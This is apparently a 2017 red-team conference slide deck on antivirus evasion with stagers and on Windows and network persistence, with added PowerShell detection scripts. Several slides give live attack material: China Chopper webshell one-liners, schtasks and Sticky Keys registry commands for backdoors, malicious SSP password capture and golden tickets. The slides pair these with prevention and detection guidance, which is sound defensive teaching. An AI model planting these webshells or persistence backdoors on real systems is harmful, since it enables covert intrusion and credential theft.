Posted on 12-Apr-2017

The Supporting Role of Antivirus while Persisting

@ChrisTruncer

Christopher Truncer

Previous Systems Administrator turned Red Teamer

Red Team Lead at Mandiant

Florida State Seminole

Open Source Developer

@ChrisTruncer

What’s this talk about?

◉ How Stagers Work
◉ Case Study: Bypassing a Signature
◉ The Right Way to do Detection
◉ Persistence - lots of it! :)
◉ Old School and New School Techniques
◉ Persistence Detection
◉ Questions

Antivirus Evasion

Antivirus Evasion

◉ White hats and attackers need to evade antivirus

◉ Evading to establish immediate C&C of compromised system

◉ Also used to maintain access on a system/in a network

Antivirus Evasion

◉ If required to use an executable, we’ll use a stager

◉ Stager - Veil-Evasion or MSFVenom output
◉ Inject shellcode into memory
◉ Shellcode will download and inject a reflective DLL
◉ A “loader” for your real malware

Stagers

◉ Stagers can be developed in any language that can interact with the Windows functions

◉ It’s not hard to write a stager
○ Just four function calls

Stagers

◉ Allocate memory to store shellcode, and set the proper memory permissions

◉ Copy shellcode into the allocated memory
◉ Create a thread to execute the shellcode
◉ Have code wait until the thread is done executing

Stagers

◉ VirtualAlloc
◉ RtlMoveMemory
◉ CreateThread
◉ WaitForSingleObject

AV’s Approach to Catching Malware

Methods of Detection

◉ Signature Based
○ This is what Veil-Evasion targets

◉ Heuristics Based
◉ Crowd Sourced
○ Reputation Based

Veil’s Approach to Bypassing AV

Approaches to Bypassing AV

◉ Ghost code / net no-operation code
◉ Encrypted binaries
○ Hyperion

◉ Custom Code

Veil’s Approach

◉ Fight on-disk detection through different techniques
○ Obfuscated code
○ Encrypted code
○ Non-standard languages for Windows binaries
■ Python, Ruby, Perl, etc.
○ Shellcode-less binaries

Veil’s Approach

◉ Languages within Veil-Evasion
○ Python
○ Perl
○ PowerShell
○ C#
○ C
○ Go
○ Ruby

Veil’s Approach

◉ Using a language that’s not C or C# made a large difference
○ AV programs didn’t know, or couldn’t properly inspect, non-standard languages

◉ Example:
○ C vs. Python

Simply changing the language the code is written in completely bypassed all signatures.

Veil Module

Veil Module

◉ Add a little complexity, so it isn’t immediately obvious what is happening

◉ What about encrypting the code?
◉ What about making the tool brute-force its own key?

Stallion

◉ Generate a random encryption key that is artificially constrained
○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567

◉ Test for a known string with the decryption key
○ If it doesn’t match, it’s the wrong key
○ If it matches, decrypt the shellcode and inject it into memory

Signature Bypass

Signature Bypass

◉ After approximately one year, Veil had its first AV signature

Signature Bypass

◉ I was excited to see if someone had finally figured Veil-Evasion out
○ It is open source…

◉ Previous attempts have turned out fairly humorous

Persistence

Hosts vs. Networks

Persistence Purposes

◉ Persistence is commonly used for one of two purposes:
○ Persisting on a host
○ Persisting on a network

◉ A lot of the techniques I will cover can facilitate access for both purposes

Persisting Hosts

◉ When persisting on a host, an attacker is looking for ad-hoc or programmatically defined access to a system
○ Attackers want this as close to on-demand as possible

◉ The efforts undertaken by an attacker are directed to maintaining access to a specific host

Persisting Hosts

◉ What’s needed for persisting hosts?
○ Survive reboots
■ Probably the most important concept
○ Have administrative rights on the system
○ Complement network-based persistence

Persisting Networks

◉ Network-based persistence in two contexts
○ Used to maintain access into a network
■ Similar to host-based persistence, but its purpose is access to the network, not to a host
○ Used to maintain access into different networks
■ Don’t want to be VLANed off in a VoIP network

Persisting Networks (continued)

◉ What other network-based persistence options are there?
○ Attackers can use persistence not only to maintain access to a network, but also to obtain their required domain permissions on-demand
○ Access is likely facilitated through a host-based persistence technique

Persisting Networks

Web Shells

◉ Funny, this seems so trivial and easy that you’d think no one would ever use it…

◉ ...that’s not the case
○ China Chopper - APT17, APT19, APT22
○ ITSecShell, reDuh, ASPShell
○ Even commodity code

China Chopper

◉ Very tiny webshell, about 4 KB stored server side
◉ Developed in a variety of languages
○ CFM
○ ASP
○ PHP
○ Etc.

◉ A client application is used to interact with the webshell

China Chopper Server Code

◉ ASP
○ <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

◉ PHP
○ <?php @eval($_POST['password']);?>

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

China Chopper

◉ Really useful features in China Chopper
○ File explorer
○ Upload/download files
○ Modify file timestamp attributes
○ Database client - MSSQL, MySQL
○ Command shell

Web Shell Prevention & Detection

◉ Hunt/sweep for known bad files
○ Hashes, or other file-based indicators

◉ Blacklist all filetypes except expected files for upload functionality

◉ Don’t allow your web server to execute files uploaded from untrusted sources

Magic Packet

◉ Or “how to access port 12345 with a packet to port 443”

◉ The attacker’s problem:
○ Compromised a web server (ports 80 and 443 are in use)
○ Firewall(s) prevent connections to any other port
○ Wants a TCP backdoor to be remotely accessible
■ Can’t be bothered to write a webshell

Magic Packet

◉ Run backdoor listening on port 12345
◉ Run malware “low” in the network stack
○ Check incoming TCP SYN packets
○ When a SYN packet is received with a specific signature, change the destination port from 443 to 12345
○ The Windows network stack then delivers the packet to port 12345
○ Malware alters the port in all subsequent packets for the stream

[Diagram: the attacker sends “Syn, dport: 443, data=s3cr37”; the malware on the compromised system rewrites it to “Syn, dport: 12345”; the backdoor’s reply “SynAck, sport: 12345” is rewritten back to “SynAck, sport: 443” before it leaves the host; both port 443 and port 12345 are shown on the compromised system]

Magic Packet - Defenses

◉ This malware was installed via a custom compiled executable
○ Application whitelisting
○ Device Guard

Outlook

◉ Outlook rules can help provide a very unique on-demand foothold onto a host

◉ Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system

◉ Provides access immediately when Outlook triggers the rule

Outlook

◉ Attacker creates an Outlook rule to execute a binary when the “trigger” subject is received
◉ Attacker syncs the rule to the target user’s account
◉ Send an e-mail with the trigger in the subject
◉ Get shell :)

Outlook - Additional Tweaks

◉ Have another rule auto-delete the incoming e-mail to prevent the user from noticing the trigger
○ https://silentbreaksecurity.com/malicious-outlook-rules/

Outlook - Detection

◉ Honestly, not certain on the best means to detect this at scale

◉ Primary IOC is executing a program when receiving an e-mail
○ I don’t know of any legit use cases for this

Persisting Hosts

Registry Hacks

◉ This is the 101 method for persistence that almost everyone learns

◉ Extremely easy to set up, and can be installed with a range of permissions

Registry Hacks

◉ These can be configured to run when the system starts, or when a user logs into the system
○ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
○ HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

◉ These methods are highly publicized and well known.

◉ Defensive tools look for these

Registry Hacks - Takeaway

◉ These can be good for maintaining initial access, but not for long term use

◉ SOCs - you want to have the ability to detect these
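An added PowerShell example (not from the talk) of the detection the takeaway asks for: it enumerates the Run and RunOnce values under HKLM and HKCU, pulls the executable out of each command line and reports entries whose image is missing or not validly Authenticode-signed. The WOW6432Node key and the signature check are additions beyond the two keys on the slide.

```powershell
# Metadata properties PowerShell attaches to every registry object; these are not autorun values
$RegistryMeta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

# Pull the executable out of a Run value: a quoted path, or the first token ending in .exe
function Resolve-CommandImage([string]$Command) {
    $Command = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($Command -match '^"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^(.+?\.exe)(\s|$)') { return $Matches[1] }
    return ($Command -split ' ')[0]
}

function Get-AutorunEntries {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $values = (Get-ItemProperty -Path $key).PSObject.Properties |
            Where-Object { $_.Name -notin $RegistryMeta }
        foreach ($v in $values) {
            $command = [string]$v.Value
            $image   = Resolve-CommandImage $command
            # A missing image is itself suspicious: something expects to be there later
            $status  = if ($image -and (Test-Path -LiteralPath $image -PathType Leaf)) {
                (Get-AuthenticodeSignature -FilePath $image).Status
            } else { 'ImageNotFound' }
            [pscustomobject]@{
                Key = $key; Name = $v.Name; Command = $command; Image = $image; Signature = $status
            }
        }
    }
}

# Anything that is not a present, validly signed binary deserves a look
Get-AutorunEntries | Where-Object { $_.Signature -ne 'Valid' } | Format-Table -AutoSize
```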

Startup Folder

◉ Your system will execute files in the startup folder
○ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Scheduled Tasks

◉ Scheduled tasks are an easy way for a user of any level to persist on a system

◉ With the proper permissions, you can schedule a task up to the SYSTEM level

◉ This is Microsoft’s recommendation/alternative to using “at” jobs

Scheduled Tasks

◉ Scheduled tasks can be created from the command line with schtasks.exe or the GUI

◉ Tasks can run at startup, when a user logs into the system, after the system has been idle, etc.

◉ Tasks can run binaries, PowerShell one-liners, and more

Scheduled Tasks

◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:\users\chris\downloads\safe.exe

◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:\totallylegit.exe /s winsqldbsystem

Scheduled Tasks - Detection

◉ Obtain a baseline of the scheduled tasks set to run on your systems
○ schtasks /query
○ Task Scheduler
○ Etc.

◉ Audit systems and identify deviations from your baseline

Service Manipulation

◉ Services usually run with SYSTEM-level permissions, so they can be juicy targets for attackers

◉ Easy way to install service based persistence? Check service binary write permissions!

Service Manipulation

◉ Now that you’ve found services that can be modified, you just need a service binary
○ Veil-Evasion, PowerUp, custom code

◉ Save the original service binary
◉ Bounce the box (or service) if required

Sticky Keys

◉ With administrative access to a machine, you can easily set up Sticky Keys
○ Copy sethc.exe
○ Copy cmd.exe to C:\Windows\System32\sethc.exe
○ Reboot, and hit Shift five times

Sticky Keys - Another Method

◉ Set cmd.exe as the debugger for sethc.exe
◉ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Sticky Keys - Another Method

◉ Main problem - doesn’t require authentication
◉ If using Sticky Keys, ensure it’s calling back to a location you control, vs. opening up the system for everyone

Sticky Keys - Detection

◉ Compare known good sethc.exe binary hash with systems’ current sethc.exe binary

◉ Ensure no registry key is added defining a debugger for sethc.exe
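The two detection checks above as an added PowerShell example (not from the talk), plus one the slide does not mention: a cmd.exe copied over sethc.exe still carries cmd’s own version resource, so its OriginalFilename no longer matches the file name. The binary name is a parameter so the same check can be run against the other accessibility helpers in System32 (utilman.exe, osk.exe), which goes beyond the slide; the hash is reported for comparison with your own known-good image.

```powershell
function Test-AccessibilityBinary {
    param([string]$Binary = 'sethc.exe')
    $path     = Join-Path $env:SystemRoot "System32\$Binary"
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. A copied-in cmd.exe keeps cmd's version resource, so the embedded
    #    OriginalFilename (normally the binary's own name) no longer matches the name on disk
    $original = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
    if ($original -and $original -ne $Binary) {
        $findings.Add("Version resource says OriginalFilename '$original', not $Binary")
    }

    # 2. Microsoft signs its accessibility binaries; a replaced or patched file fails validation
    $sig = Get-AuthenticodeSignature -FilePath $path
    if ($sig.Status -ne 'Valid') {
        $findings.Add("Signature status is $($sig.Status)")
    }

    # 3. Hash for comparison with the known-good value taken from your gold image
    $sha256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash

    # 4. An IFEO Debugger value makes Windows launch that program instead of the binary
    $ifeo = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$Binary"
    $debugger = (Get-ItemProperty -Path $ifeo -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($debugger) {
        $findings.Add("IFEO Debugger set to '$debugger'")
    }

    [pscustomobject]@{
        Binary   = $path
        SHA256   = $sha256
        Findings = $findings.ToArray()
        Suspect  = ($findings.Count -gt 0)
    }
}

# Check sethc.exe from the slides and two other accessibility helpers
'sethc.exe', 'utilman.exe', 'osk.exe' | ForEach-Object { Test-AccessibilityBinary $_ } |
    Where-Object Suspect | Format-List
```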

New School Persistence Techniques

DLL Search Order Hijack

◉ DLL search order hijacking exploits how Windows searches for DLLs when loading an executable

◉ Specifically, it exploits the fact that Windows will always search the executable’s current folder for a DLL

DLL Search Order Hijack

◉ Sample in CAPEC
○ If you drop ntshrui.dll within C:\Windows and run explorer.exe, you can get the DLL within C:\Windows to be executed

◉ This exploits the order in which the DLL is searched for on a Windows system

DLL Search Order Hijack

◉ Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system

◉ Since it’s every time the application runs, it can be used as a persistence technique

◉ PowerUp can be used to find these opportunities

DLL Search Order Hijack

◉ Used by the following actors:
○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26

◉ Used by the following malware:
○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER

Legitimate Scheduled Tasks

◉ Easy to identify scheduled tasks named “Evil task”

◉ First we must look at how investigators detect malicious scheduled tasks

Legitimate Scheduled Tasks

◉ Stacking tasks across multiple systems to determine anomalous tasks

◉ Parse task scheduler log (schedLgu.txt)

Legitimate Scheduled Tasks

◉ What if we modify existing legit scheduled tasks?
○ Specifically tasks that are not required for Windows functionality
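An added PowerShell example (not from the talk) that serves both the baseline-and-deviation detection from the Scheduled Tasks slides and the tampered-legitimate-task case just described: snapshot every executable action, save it on a known-good image, and later report actions that are new or whose arguments or run-as principal changed. It uses the ScheduledTasks module (Get-ScheduledTask, Windows 8/Server 2012 and later) instead of schtasks /query; the baseline file path is an assumption.

```powershell
# One record per executable action: which task, what runs, with what arguments, as whom
function Get-TaskSnapshot {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            [pscustomobject]@{
                # Keying on task path + executable means a swapped binary shows up as NEW
                Id        = "$($task.TaskPath)$($task.TaskName)|$($action.Execute)"
                Execute   = $action.Execute
                Arguments = [string]$action.Arguments
                RunAs     = [string]$task.Principal.UserId
            }
        }
    }
}

# Capture the snapshot on a known-good image (the path is an assumption)
function Save-TaskBaseline([string]$Path = 'C:\Baseline\scheduled-tasks.json') {
    @(Get-TaskSnapshot) | ConvertTo-Json -Depth 3 | Set-Content -Path $Path -Encoding UTF8
}

# Report actions absent from the baseline (a new task, or a legit task whose binary was
# replaced) and baseline actions whose arguments or run-as principal were modified
function Compare-TaskBaseline([string]$Path = 'C:\Baseline\scheduled-tasks.json') {
    $baseline = @{}
    foreach ($b in @(Get-Content -Raw -Path $Path | ConvertFrom-Json)) { $baseline[$b.Id] = $b }
    foreach ($t in Get-TaskSnapshot) {
        $old = $baseline[$t.Id]
        $change = if (-not $old) { 'NEW' }
                  elseif ($old.Arguments -ne $t.Arguments -or $old.RunAs -ne $t.RunAs) { 'MODIFIED' }
        if ($change) {
            [pscustomobject]@{
                Change = $change; Task = $t.Id; Arguments = $t.Arguments; RunAs = $t.RunAs
            }
        }
    }
}

# Run Save-TaskBaseline once on the gold image, then Compare-TaskBaseline during audits
Compare-TaskBaseline | Format-Table -AutoSize
```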

Unquoted Service Paths

◉ Unquoted service paths exploit a vulnerability in the order in which Windows searches for a binary when a space is in an unquoted path
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe

Unquoted Service Paths

◉ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
○ C:\Program.exe
○ C:\Program Files(x86)\Steam\Steam.exe
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe

◉ Three opportunities

Unquoted Service Paths

◉ If we have write access to any of the paths that Windows looks in, we can hijack the service
○ Just need a service binary

◉ Drop it into any of the paths on the previous slide, and restart the service
○ Might need to wait for a reboot

Unquoted Service Paths - Prevention

◉ Check service binaries on your images and determine if any are using unquoted service paths.

◉ Make sure the paths aren’t writable to non-admins.

◉ PowerUp can find these as well
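An added PowerShell example (not from the talk, and independent of PowerUp) implementing the prevention slide: walk the installed services, expand each unquoted path into the candidate binaries Windows tries in order (the slide’s “three opportunities” for the Steam path), and report the hijack locations whose directory grants write or create-file rights to broad groups. The list of broad principals is an assumption you may need to extend for your environment.

```powershell
# Candidate executables Windows tries for an unquoted path, in order: each space splits
# the path into a "prefix.exe" attempt until the intended .exe is reached
function Get-PathCandidates([string]$ImagePath) {
    $tokens = $ImagePath.Trim() -split ' '
    $candidates = @()
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        $prefix = $tokens[0..$i] -join ' '
        if ($prefix -like '*.exe') { $candidates += $prefix; break }  # intended binary
        $candidates += "$prefix.exe"
    }
    return $candidates
}

# Does the directory let non-admin principals drop a file into it?
function Test-BroadWriteAccess([string]$Dir) {
    if (-not $Dir -or -not (Test-Path -LiteralPath $Dir)) { return $false }
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $broad -contains $ace.IdentityReference.Value -and
            "$($ace.FileSystemRights)" -match 'Write|Modify|FullControl|CreateFiles') { return $true }
    }
    return $false
}

function Get-UnquotedServicePaths {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' } |
        ForEach-Object {
            $svc   = $_
            $cands = Get-PathCandidates $svc.PathName
            if ($cands.Count -lt 2) { return }   # binary path has no spaces: nothing to hijack
            # Every candidate except the last resolves before the real binary
            foreach ($cand in $cands[0..($cands.Count - 2)]) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Candidate = $cand
                    Writable  = Test-BroadWriteAccess (Split-Path -Parent $cand)
                }
            }
        }
}

Get-UnquotedServicePaths | Format-Table -AutoSize
```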

WMI Requirements

◉ Event Filter
◉ Event Consumer
◉ Filter/Consumer Binding

WMI Requirements - Event Filter

◉ The WMI query that fires upon an event occurring
○ Usually, an event class derived from __InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent

WMI Requirements - Event Consumer

◉ There are five different event consumers
○ The most interesting one is “CommandLineEventConsumer”

◉ These “consume” or act on events that occur

WMI Requirements - Filter/Consumer Binding

◉ This associates a WMI Event Filter with the Event Consumer

WMI - Persistence

◉ PowerSploit’s persistence module for WMI
○ Automates the creation process
○ Will create a permanent WMI event subscription
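The three objects the requirements slides name are exactly what a defender should enumerate. This added PowerShell example (not from the talk or PowerSploit) lists every __FilterToConsumerBinding in root\subscription together with the query that triggers it and the command or script its consumer runs; the ActiveScriptEventConsumer handling goes beyond the CommandLineEventConsumer the slide singles out.

```powershell
function Get-WmiSubscriptions {
    $ns = 'root/subscription'

    # Index filters and consumers by name so each binding can be resolved to its parts
    $filters = @{}
    Get-CimInstance -Namespace $ns -ClassName __EventFilter |
        ForEach-Object { $filters[$_.Name] = $_ }
    # __EventConsumer is the abstract base class, so this returns every consumer type
    $consumers = @{}
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer |
        ForEach-Object { $consumers[$_.Name] = $_ }

    foreach ($binding in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding) {
        # Reference properties come back as CimInstances carrying the key property, Name
        $filterName   = [string]$binding.Filter.Name
        $consumerName = [string]$binding.Consumer.Name
        $f = $filters[$filterName]
        $c = $consumers[$consumerName]
        $type = if ($c) { $c.CimClass.CimClassName } else { 'MissingConsumer' }
        # What actually runs: a command line, or inline script text / a script file
        $payload = switch ($type) {
            'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)".Trim() }
            'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName } }
            default                     { '' }
        }
        [pscustomobject]@{
            Filter   = $filterName
            Query    = if ($f) { $f.Query } else { '<filter missing>' }
            Consumer = $consumerName
            Type     = $type
            Payload  = $payload
        }
    }
}

Get-WmiSubscriptions | Format-List
```

Expect a small set of Microsoft defaults on many builds (for example the SCM Event Log Consumer); anything else, especially a CommandLineEventConsumer bound to an __InstanceModificationEvent timer query, warrants investigation.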

PowerShell Profiles

◉ Anytime PowerShell runs, it will execute code in the default profile

◉ Create profile code here:
○ C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1

PowerShell Profiles

◉ Use a standard persistence mechanism to execute PowerShell silently
○ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden
○ It’s a legit exe!

PowerShell Profiles

◉ Example in profile.ps1:
○ iex("write-host 'hello world'")

Security Support Provider

◉ A Security Support Provider (SSP) - a security package
○ An extension used to perform authentication during a client/server exchange

◉ An Authentication Package (AP)
○ Extends interactive logon authentication
○ Example: RSA tokens

Security Support Provider

◉ SSP/AP
○ Can serve the tasks of both SSPs and APs - loaded into lsass at boot
○ Example: Kerberos and msv1_0 (NTLM)

Security Support Provider

◉ Install your own SSP that is loaded into lsass.exe
◉ Can develop your own SSP DLL
◉ Use the Persistence module in PowerSploit to install your malicious SSP

Security Support Provider

◉ Ben Delpy (@gentilkiwi) added SSP functionality into mimilib.dll
○ Once installed and loaded into lsass.exe, it captures plaintext passwords

Excel Magic

◉ Malicious macro executes backdoor
◉ How can you ensure persistence?
○ Most users will run Excel once a day
○ You can use any “old school” technique to spawn Excel
○ Disable macro security settings to run the macro without a user prompt

Excel Magic

◉ Registry modification that opens a specific workbook upon starting Excel
○ HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\Trusted Locations
○ Just add the location

Additional Persistence Opportunities

Golden Tickets

◉ Method was developed with Ben Delpy and Sean Metcalf

◉ Forges a “golden” Kerberos ticket which can be good for 10 years!

◉ Golden tickets provide on-demand domain privilege “upgrades” for any group within the domain

Golden Tickets

◉ Only need four pieces of information
○ Domain SID
○ Name of the domain
○ User you want to create a ticket for
○ krbtgt account hash

◉ You can build your ticket at home, offline

Golden Ticket Takeaways

◉ If impersonating an account, tickets are still valid even if the password changes

◉ Valid for as long as you specify (10 year default)
◉ Domain trusts
○ Child domains can compromise the parent

◉ Only way to stop it is to change the krbtgt hash… twice…
◉ Or rebuild from bare metal

Account Checkout - Case Study

◉ Client had account checkout system for domain administrator accounts

◉ Only two users with access to the checkout system
◉ System requires 2FA
◉ DA access is lost if the user changes their password/PIN/token
◉ Users can see checked-out accounts

Account Checkout - Case Study

◉ Persist domain administrator without getting caught
○ Can’t continuously check out accounts

◉ Password vault permissions were managed through Active Directory groups
○ Tons of them

Account Checkout - Case Study

◉ Copy group memberships to a compromised user account
○ User doesn’t use the Password Vault
■ All changes were documented

◉ This gave us all the permissions we needed without needing access to their Password Vault

Conclusions

Conclusions

◉ Persistence will remain rampant
◉ Always new and creative ways to maintain persistence
◉ Understanding persistence techniques is critical to detecting attacker access

Thanks!

ANY QUESTIONS?

@ChrisTruncer

Christopher.Truncer@mandiant.com
